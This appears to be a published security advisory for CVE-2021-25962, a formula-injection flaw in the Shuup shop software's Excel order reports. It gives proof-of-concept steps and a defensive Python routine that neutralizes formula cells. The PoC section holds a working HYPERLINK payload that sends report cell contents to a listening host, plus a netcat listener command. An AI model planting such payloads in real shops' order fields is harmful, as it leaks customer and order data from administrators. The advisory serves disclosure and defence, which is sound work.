CVE-2021-25962

Date: September 29, 2021

Overview

The “Shuup” application in versions 0.4.2 to 2.10.8 is affected by a “Formula Injection” vulnerability. A customer can inject a spreadsheet formula payload into the name input field of the billing address while buying a product. When a store administrator exports the reports page as an Excel file and opens it, the payload is executed by the spreadsheet application.

Details

The “Shuup” application is affected by a “Formula Injection” vulnerability. Customer-supplied data from the billing address name field is written into the exported Orders Report without neutralizing leading formula characters. A customer can therefore inject a payload in that field while buying a product, and when a store administrator exports the report as an Excel file and opens it, the payload is executed by the spreadsheet application.

PoC Details

1. Browse the application (in our case: 0.0.0.0:9000) and add a product to the cart. Click on the cart and click “proceed to checkout”. Fill in the form as you like, and make sure you enter the payload given below in the name field (the first field). Press continue until you reach the page saying the order is complete.
2. Now browse to the admin panel (0.0.0.0:9000/sa) and go to the reports page found in the menu (on the top left).
3. Open a terminal and make sure you are listening on some port (in our case: 4444).
4. Now log in to the application as the store administrator with the admin credentials. Navigate to the Reports tab and select the report type “Orders Report” and the output format “Excel”. Check the Download option and click “Get Report” at the bottom of the page.
5. Open the report and click on the payload (“Click here” in the table). Clicking the link sends the content of cells A3 and B3 of the report table to the attacker.
6. As the attacker, check the terminal: you will see an HTTP GET request containing the order reference and the date and time of the order.

PoC Code

// Payload
=HYPERLINK("http://0.0.0.0:4444?x="&A3&B3,"Click Here")

// Command to listen to port 4444
sudo nc -l 4444

Affected Environments

Shuup 0.4.2 - 2.10.8

Prevention

Upgrade to Shuup 2.11.0 or higher
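As an added defensive example (not Shuup's own code), the following neutralizes formula-triggering cell values before a report row is serialized, and lists stored orders whose billing name would be interpreted as a formula if exported as-is. It uses the standard-library csv writer as a stand-in for the Excel export; the column names and order dicts are assumptions, not Shuup's real report layout.

```python
import csv
import io

# Leading characters that spreadsheet applications read as the start of a
# formula. Tab and carriage return are included because some importers strip
# them and then evaluate the remainder as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a value that a spreadsheet renders as literal text.

    Strings starting with a formula trigger get a leading single quote, which
    spreadsheet applications treat as a text marker; non-strings pass through.
    """
    if isinstance(value, str) and value[:1] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def find_formula_like_values(orders, field="billing_name"):
    """References of orders whose stored field would be evaluated as a formula."""
    return [o["reference"] for o in orders
            if isinstance(o[field], str) and o[field][:1] in FORMULA_TRIGGERS]


def export_orders_csv(orders):
    """Serialize order rows with every cell neutralized.

    The columns are an assumed report layout, not Shuup's real one; csv stands
    in for the Excel writer, and the same neutralization applies there.
    """
    columns = ("reference", "created_on", "billing_name")
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    writer.writerow(columns)
    for order in orders:
        writer.writerow([neutralize_cell(order[c]) for c in columns])
    return buf.getvalue()


# Constructed sample data: one benign order and one whose billing name is a
# formula-shaped string of the kind described in the advisory.
SAMPLE_ORDERS = [
    {"reference": "1001", "created_on": "2021-09-29 10:00", "billing_name": "Jane Doe"},
    {"reference": "1002", "created_on": "2021-09-29 10:05",
     "billing_name": '=HYPERLINK("http://example.invalid","Click")'},
]
```

Prefixing with a quote also affects legitimate values such as phone numbers beginning with "+", so apply it only on the export path, not to the stored data.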

Language: Python

Good to know:


CWE-1236: Improper Neutralization of Formula Elements in a CSV File

Upgrade Version

Upgrade to version shuup - 2.11.0


CVSS v3 base metrics:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

CVSS v2 base metrics:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial